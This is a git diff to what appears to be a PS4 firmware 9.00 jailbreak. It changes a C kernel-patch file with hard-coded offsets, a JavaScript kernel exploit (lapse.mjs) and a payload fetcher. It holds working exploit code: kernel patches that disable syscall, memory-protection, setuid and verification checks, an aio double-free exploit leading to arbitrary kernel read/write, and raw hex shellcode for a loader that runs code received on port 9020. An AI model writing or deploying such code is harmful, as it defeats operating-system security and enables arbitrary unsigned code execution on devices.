diff --git a/kpatch/900.c b/kpatch/900.c
index ef99a9f..2ff5a67 100644
--- a/kpatch/900.c
+++ b/kpatch/900.c
@@ -16,7 +16,6 @@ You should have received a copy of the GNU Affero General Public License
along with this program. If not, see . */
#include
-#include
#include "types.h"
#include "utils.h"
@@ -58,123 +57,51 @@ void do_patch(void) {
void * const kbase = (void *)rdmsr(0xC0000082) - off_fast_syscall;
disable_cr0_wp();
-
- // patch amd64_syscall() to allow calling syscalls everywhere
-
- // struct syscall_args sa; // initialized already
- // u64 code = get_u64_at_user_address(td->tf_frame-tf_rip);
- // int is_invalid_syscall = 0
- //
- // // check the calling code if it looks like one of the syscall stubs at a
- // // libkernel library and check if the syscall number correponds to the
- // // proper stub
- // if ((code & 0xff0000000000ffff) != 0x890000000000c0c7
- // || sa.code != (u32)(code >> 0x10)
- // ) {
- // // patch this to " = 0" instead
- // is_invalid_syscall = -1;
- // }
- write32(kbase, 0x490, 0);
- // these code corresponds to the check that ensures that the caller's
- // instruction pointer is inside the libkernel library's memory range
- //
- // // patch the check to always go to the "goto do_syscall;" line
- // void *code = td->td_frame->tf_rip;
- // if (libkernel->start <= code && code < libkernel->end
- // && is_invalid_syscall == 0
- // ) {
- // goto do_syscall;
- // }
- //
- // do_syscall:
- // ...
- // lea rsi, [rbp - 0x78]
- // mov rdi, rbx
- // mov rax, qword [rbp - 0x80]
- // call qword [rax + 8] ; error = (sa->callp->sy_call)(td, sa->args)
- //
- // sy_call() is the function that will execute the requested syscall.
- write16(kbase, 0x4b5, 0x9090);
- write16(kbase, 0x4b9, 0x9090);
- write8(kbase, 0x4c2, 0xeb);
-
- // patch sys_mmap() to allow rwx mappings
-
- // patch maximum cpu mem protection: 0x33 -> 0x37
- // the ps4 added custom protections for their gpu memory accesses
- // GPU X: 0x8 R: 0x10 W: 0x20
- // that's why you see other bits set
- // ref: https://cturt.github.io/ps4-2.html
- write8(kbase, 0x16632a, 0x37);
- write8(kbase, 0x16632d, 0x37);
-
- // patch vm_map_protect() (called by sys_mprotect()) to allow rwx mappings
- //
- // this check is skipped after the patch
- //
- // if ((new_prot & current->max_protection) != new_prot) {
- // vm_map_unlock(map);
- // return (KERN_PROTECTION_FAILURE);
- // }
- write32(kbase, 0x80b8d, 0);
-
- // patch sys_dynlib_dlsym() to allow dynamic symbol resolution everywhere
-
- // call ...
- // mov r14, qword [rbp - 0xad0]
- // cmp eax, 0x4000000
- // jb ... ; patch jb to jmp
- write8(kbase, 0x23B67F, 0xeb);
- // patch called function to always return 0
- //
- // sys_dynlib_dlsym:
- // ...
- // mov edi, 0x10 ; 16
- // call patched_function ; kernel_base + 0x951c0
- // test eax, eax
- // je ...
- // mov rax, qword [rbp - 0xad8]
- // ...
- // patched_function: ; patch to "xor eax, eax; ret"
- // push rbp
- // mov rbp, rsp
- // ...
- write32(kbase, 0x221B40, 0xC3C03148);
-
- // patch sys_setuid() to allow freely changing the effective user ID
-
- // ; PRIV_CRED_SETUID = 50
- // call priv_check_cred(oldcred, PRIV_CRED_SETUID, 0)
- // test eax, eax
- // je ... ; patch je to jmp
- write8(kbase, 0x1A06, 0xeb);
-
- // patch sysveri to prevent delayed panics
- write16(kbase, 0x626874, 0x9090);
-
- // overwrite the entry of syscall 11 (unimplemented) in sysent
- //
- // struct args {
- // u64 rdi;
- // u64 rsi;
- // u64 rdx;
- // u64 rcx;
- // u64 r8;
- // u64 r9;
- // };
- //
- // int sys_kexec(struct thread td, struct args *uap) {
- // asm("jmp qword ptr [rsi]");
- // }
-
- // sysent[11]
+ //ChendoChap Patches For 900
+ const size_t KERNEL_enable_syscalls_1 = 0x490;
+ const size_t KERNEL_enable_syscalls_2 = 0x4B5;
+ const size_t KERNEL_enable_syscalls_3 = 0x4B9;
+ const size_t KERNEL_enable_syscalls_4 = 0x4C2;
+ const size_t KERNEL_mprotect = 0x80B8D;
+ const size_t KERNEL_prx = 0x23AEC4;
+ const size_t KERNEL_mmap_1 = 0x16632A;
+ const size_t KERNEL_mmap_2 = 0x16632D;
+ const size_t KERNEL_dlsym_1 = 0x23B67F;
+ const size_t KERNEL_dlsym_2 = 0x221b40;
+ const size_t KERNEL_setuid = 0x1A06;
+ const size_t KERNEL_bzero = 0x2713FD;
+ const size_t KERNEL_pagezero = 0x271441;
+ const size_t KERNEL_memcpy = 0x2714BD;
+ const size_t KERNEL_pagecopy = 0x271501;
+ const size_t KERNEL_copyin = 0x2716AD;
+ const size_t KERNEL_copyinstr = 0x271B5D;
+ const size_t KERNEL_copystr = 0x271C2D;
+ const size_t KERNEL_veriPatch = 0x626874;
+ const size_t KERNEL_setcr0_patch = 0x3ade3B;
+ write32(kbase, KERNEL_enable_syscalls_1, 0);
+ write16(kbase, KERNEL_enable_syscalls_2, 0x9090);
+ write16(kbase, KERNEL_enable_syscalls_3, 0x9090);
+ write8(kbase, KERNEL_enable_syscalls_4, 0xEB);
+ write8(kbase, KERNEL_mmap_1, 0x37);
+ write8(kbase, KERNEL_mmap_2, 0x37);
+ write32(kbase, KERNEL_mprotect, 0);
+ write8(kbase, KERNEL_dlsym_1, 0xEB);
+ write32(kbase, KERNEL_dlsym_2, 0xC3C03148);
+ write8(kbase, KERNEL_setuid, 0xEB);
+ write16(kbase, KERNEL_prx, 0xE990);
+ write8(kbase, KERNEL_bzero, 0xEB);
+ write8(kbase, KERNEL_pagezero, 0xEB);
+ write8(kbase, KERNEL_memcpy, 0xEB);
+ write8(kbase, KERNEL_pagecopy, 0xEB);
+ write8(kbase, KERNEL_copyin, 0xEB);
+ write8(kbase, KERNEL_copyinstr, 0xEB);
+ write8(kbase, KERNEL_copystr, 0xEB);
+ write16(kbase, KERNEL_veriPatch, 0x9090);
+ write32(kbase, KERNEL_setcr0_patch, 0xC3C7220F);
const size_t offset_sysent_11 = 0x1100520;
- // .sy_narg = 6
- write32(kbase, offset_sysent_11, 6);
- // .sy_call = gadgets['jmp qword ptr [rsi]']
+ write32(kbase, offset_sysent_11, 2);
write64(kbase, offset_sysent_11 + 8, kbase + 0x4c7ad);
- // .sy_thrcnt = SY_THR_STATIC
- write32(kbase, offset_sysent_11 + 0x2c, 1);
+ write32(kbase, offset_sysent_11 + 0x2c, 1);
enable_cr0_wp();
}
\ No newline at end of file
diff --git a/kpatch/900.elf b/kpatch/900.elf
index 0e02611..a38fa6b 100644
Binary files a/kpatch/900.elf and b/kpatch/900.elf differ
diff --git a/kpatch/900.o b/kpatch/900.o
index febc978..2e7e5be 100644
Binary files a/kpatch/900.o and b/kpatch/900.o differ
diff --git a/lapse.mjs b/lapse.mjs
index c05ae69..39441a0 100644
--- a/lapse.mjs
+++ b/lapse.mjs
@@ -96,9 +96,6 @@ const CPU_LEVEL_WHICH = 3;
const CPU_WHICH_TID = 1;
// sys/mman.h
-const PROT_READ = 1;
-const PROT_WRITE = 2;
-const PROT_EXEC = 4;
const MAP_SHARED = 1;
const MAP_FIXED = 0x10;
@@ -136,13 +133,15 @@ const main_core = 7;
const num_grooms = 0x200;
const num_handles = 0x100;
const num_sds = 0x100; // max is 0x100 due to max IPV6_TCLASS
-const num_alias = 50; //TODO: check best value here for 9.xx
+const num_alias = 10;
const num_races = 100;
const leak_len = 16;
const num_leaks = 5;
const num_clobbers = 8;
let chain = null;
+var nogc = [];
+
async function init() {
await rop.init();
chain = new Chain();
@@ -1459,15 +1458,16 @@ function make_kernel_arw(pktopts_sds, dirty_sd, k100_addr, kernel_addr, sds) {
die('pipe read failed');
}
log('achieved arbitrary kernel read/write');
-
- // RESTORE: clean corrupt pointers
- // pktopts.ip6po_rthdr = NULL
- const off_ip6po_rthdr = is_ps4 ? 0x68 : 0x70;
- const r_rthdr_p = r_pktopts.add(off_ip6po_rthdr);
- const w_rthdr_p = w_pktopts.add(off_ip6po_rthdr);
- kmem.write64(r_rthdr_p, 0);
- kmem.write64(w_rthdr_p, 0);
- log('corrupt pointers cleaned');
+
+ // RESTORE: clean corrupt pointer
+ // pktopts.ip6po_rthdr = NULL
+ //ABC Patch
+ const off_ip6po_rthdr = 0x68;
+ const r_rthdr_p = r_pktopts.add(off_ip6po_rthdr);
+ const w_rthdr_p = w_pktopts.add(off_ip6po_rthdr);
+ kmem.write64(r_rthdr_p, 0);
+ kmem.write64(w_rthdr_p, 0);
+ log('corrupt pointers cleaned');
/*
// REMOVE once restore kernel is ready for production
@@ -1508,7 +1508,6 @@ async function patch_kernel(kbase, kmem, p_ucred, restore_info) {
const sy_narg = kmem.read32(sysent_661);
const sy_call = kmem.read64(sysent_661.add(8));
const sy_thrcnt = kmem.read32(sysent_661.add(0x2c));
-
// .sy_narg = 6
kmem.write32(sysent_661, 6);
// .sy_call = gadgets['jmp qword ptr [rsi]']
@@ -1516,18 +1515,6 @@ async function patch_kernel(kbase, kmem, p_ucred, restore_info) {
// .sy_thrcnt = SY_THR_STATIC
kmem.write32(sysent_661.add(0x2c), 1);
- log('change sys_execv() to sys_kexec()');
-
- const offset_sysent_11 = 0x1100520;
- const sysent_11 = kbase.add(offset_sysent_11);
-
- // .sy_narg = 2
- kmem.write32(sysent_11, 6);
- // .sy_call = gadgets['jmp qword ptr [rsi]']
- kmem.write64(sysent_11.add(8), kbase.add(0x4c7ad));
- // .sy_thrcnt = SY_THR_STATIC
- kmem.write32(sysent_11.add(0x2c), 1);
-
log('add JIT capabilities');
// TODO just set the bits for JIT privs
// cr_sceCaps[0]
@@ -1610,7 +1597,6 @@ async function patch_kernel(kbase, kmem, p_ucred, restore_info) {
log('setuid(0)');
sysi('setuid', 0);
log('kernel exploit succeeded!');
-
log('restore sys_aio_submit()');
kmem.write32(sysent_661, sy_narg);
// .sy_call = gadgets['jmp qword ptr [rsi]']
@@ -1639,6 +1625,20 @@ function setup(block_fd) {
}
aio_submit_cmd(AIO_CMD_READ, reqs1.addr, num_workers, block_id.addr);
+ {
+ const reqs1 = make_reqs1(1);
+ const timo = new Word(1);
+ const id = new Word();
+ aio_submit_cmd(AIO_CMD_READ, reqs1.addr, 1, id.addr);
+ chain.do_syscall_clear_errno(
+ 'aio_multi_wait', id.addr, 1, _aio_errors_p, 1, timo.addr);
+ const err = chain.errno;
+ if (err !== 60) { // ETIMEDOUT
+ die(`SceAIO system not blocked. errno: ${err}`);
+ }
+ free_aios(id.addr, 1);
+ }
+
log('heap grooming');
// chosen to maximize the number of 0x80 malloc allocs per submission
const num_reqs = 3;
@@ -1651,6 +1651,48 @@ function setup(block_fd) {
return [block_id, groom_ids];
}
+function runBinLoader() {
+ var payload_buffer = chain.sysp('mmap', 0x0, 0x300000, 0x7, 0x1000, 0xFFFFFFFF, 0);
+ var payload_loader = malloc32(0x1000);
+ var BLDR = payload_loader.backing;
+ BLDR[0] = 0x56415741; BLDR[1] = 0x83485541; BLDR[2] = 0x894818EC;
+ BLDR[3] = 0xC748243C; BLDR[4] = 0x10082444; BLDR[5] = 0x483C2302;
+ BLDR[6] = 0x102444C7; BLDR[7] = 0x00000000; BLDR[8] = 0x000002BF;
+ BLDR[9] = 0x0001BE00; BLDR[10] = 0xD2310000; BLDR[11] = 0x00009CE8;
+ BLDR[12] = 0xC7894100; BLDR[13] = 0x8D48C789; BLDR[14] = 0xBA082474;
+ BLDR[15] = 0x00000010; BLDR[16] = 0x000095E8; BLDR[17] = 0xFF894400;
+ BLDR[18] = 0x000001BE; BLDR[19] = 0x0095E800; BLDR[20] = 0x89440000;
+ BLDR[21] = 0x31F631FF; BLDR[22] = 0x0062E8D2; BLDR[23] = 0x89410000;
+ BLDR[24] = 0x2C8B4CC6; BLDR[25] = 0x45C64124; BLDR[26] = 0x05EBC300;
+ BLDR[27] = 0x01499848; BLDR[28] = 0xF78944C5; BLDR[29] = 0xBAEE894C;
+ BLDR[30] = 0x00001000; BLDR[31] = 0x000025E8; BLDR[32] = 0x7FC08500;
+ BLDR[33] = 0xFF8944E7; BLDR[34] = 0x000026E8; BLDR[35] = 0xF7894400;
+ BLDR[36] = 0x00001EE8; BLDR[37] = 0x2414FF00; BLDR[38] = 0x18C48348;
+ BLDR[39] = 0x5E415D41; BLDR[40] = 0x31485F41; BLDR[41] = 0xC748C3C0;
+ BLDR[42] = 0x000003C0; BLDR[43] = 0xCA894900; BLDR[44] = 0x48C3050F;
+ BLDR[45] = 0x0006C0C7; BLDR[46] = 0x89490000; BLDR[47] = 0xC3050FCA;
+ BLDR[48] = 0x1EC0C748; BLDR[49] = 0x49000000; BLDR[50] = 0x050FCA89;
+ BLDR[51] = 0xC0C748C3; BLDR[52] = 0x00000061; BLDR[53] = 0x0FCA8949;
+ BLDR[54] = 0xC748C305; BLDR[55] = 0x000068C0; BLDR[56] = 0xCA894900;
+ BLDR[57] = 0x48C3050F; BLDR[58] = 0x006AC0C7; BLDR[59] = 0x89490000;
+ BLDR[60] = 0xC3050FCA;
+
+ chain.sys('mprotect', payload_loader, 0x4000, (0x1 | 0x2 | 0x4));
+
+ var pthread = malloc(0x10);
+ sysi('mlock', payload_buffer, 0x300000);
+
+ call_nze(
+ 'pthread_create',
+ pthread,
+ 0,
+ payload_loader,
+ payload_buffer
+ );
+
+ log('BinLoader is ready. Send a payload to port 9020 now');
+}
+
// overview:
// * double free a aio_entry (resides at a 0x80 malloc zone)
// * type confuse a evf and a ip6_rthdr
@@ -1667,10 +1709,16 @@ export async function kexploit() {
await init();
const _init_t2 = performance.now();
+ if(sessionStorage.getItem('binloader')){
+ runBinLoader();
+ return new Promise(() => {});
+ }
+
// If setuid is successful, we dont need to run the kexploit again
try {
if (sysi('setuid', 0) == 0) {
- log("Not running kexploit again.")
+ log("Not running kexploit again.");
+ runBinLoader();
return;
}
}
@@ -1751,18 +1799,44 @@ export async function kexploit() {
}
}
+
+function malloc(sz) {
+ var backing = new Uint8Array(0x10000 + sz);
+ nogc.push(backing);
+ var ptr = mem.readp(mem.addrof(backing).add(0x10));
+ ptr.backing = backing;
+ return ptr;
+}
+
+function malloc32(sz) {
+ var backing = new Uint8Array(0x10000 + sz * 4);
+ nogc.push(backing);
+ var ptr = mem.readp(mem.addrof(backing).add(0x10));
+ ptr.backing = new Uint32Array(backing.buffer);
+ return ptr;
+}
+
+
kexploit().then(() => {
- var payload_loader = new View4(window.pld);
- chain.sys('mprotect', payload_loader.addr, payload_loader.size, PROT_READ | PROT_WRITE | PROT_EXEC);
- const ctx = new Buffer(0x10);
- const pthread = new Pointer();
- pthread.ctx = ctx;
+
+ window.pld_size = new Int(0x26200000, 0x9);
+
+ var payload_buffer = chain.sysp('mmap', window.pld_size, 0x300000, 7, 0x41000, -1, 0);
+ var payload = window.pld;
+ var bufLen = payload.length * 4
+ var payload_loader = malloc32(bufLen);
+ var loader_writer = payload_loader.backing;
+ for (var i = 0; i < payload.length; i++) {
+ loader_writer[i] = payload[i];
+ }
+ chain.sys('mprotect', payload_loader, bufLen, (0x1 | 0x2 | 0x4));
+ var pthread = malloc(0x10);
call_nze(
'pthread_create',
- pthread.addr,
- 0,
- payload_loader.addr,
+ pthread,
0,
+ payload_loader,
+ payload_buffer,
);
})
diff --git a/payload.js b/payload.js
index f64dfc2..f6a82e5 100644
--- a/payload.js
+++ b/payload.js
@@ -1,6 +1,10 @@
-fetch('./payload.bin').then(res => {
- res.arrayBuffer().then(arr => {
- window.pld = new Uint32Array(arr);
-
+if (sessionStorage.getItem('jbsuccess')) {
+ sessionStorage.setItem('binloader', 1);
+} else {
+ fetch('./payload.bin').then(res => {
+ res.arrayBuffer().then(arr => {
+ window.pld = new Uint32Array(arr);
+ sessionStorage.setItem('jbsuccess', 1);
+ })
})
-})
\ No newline at end of file
+}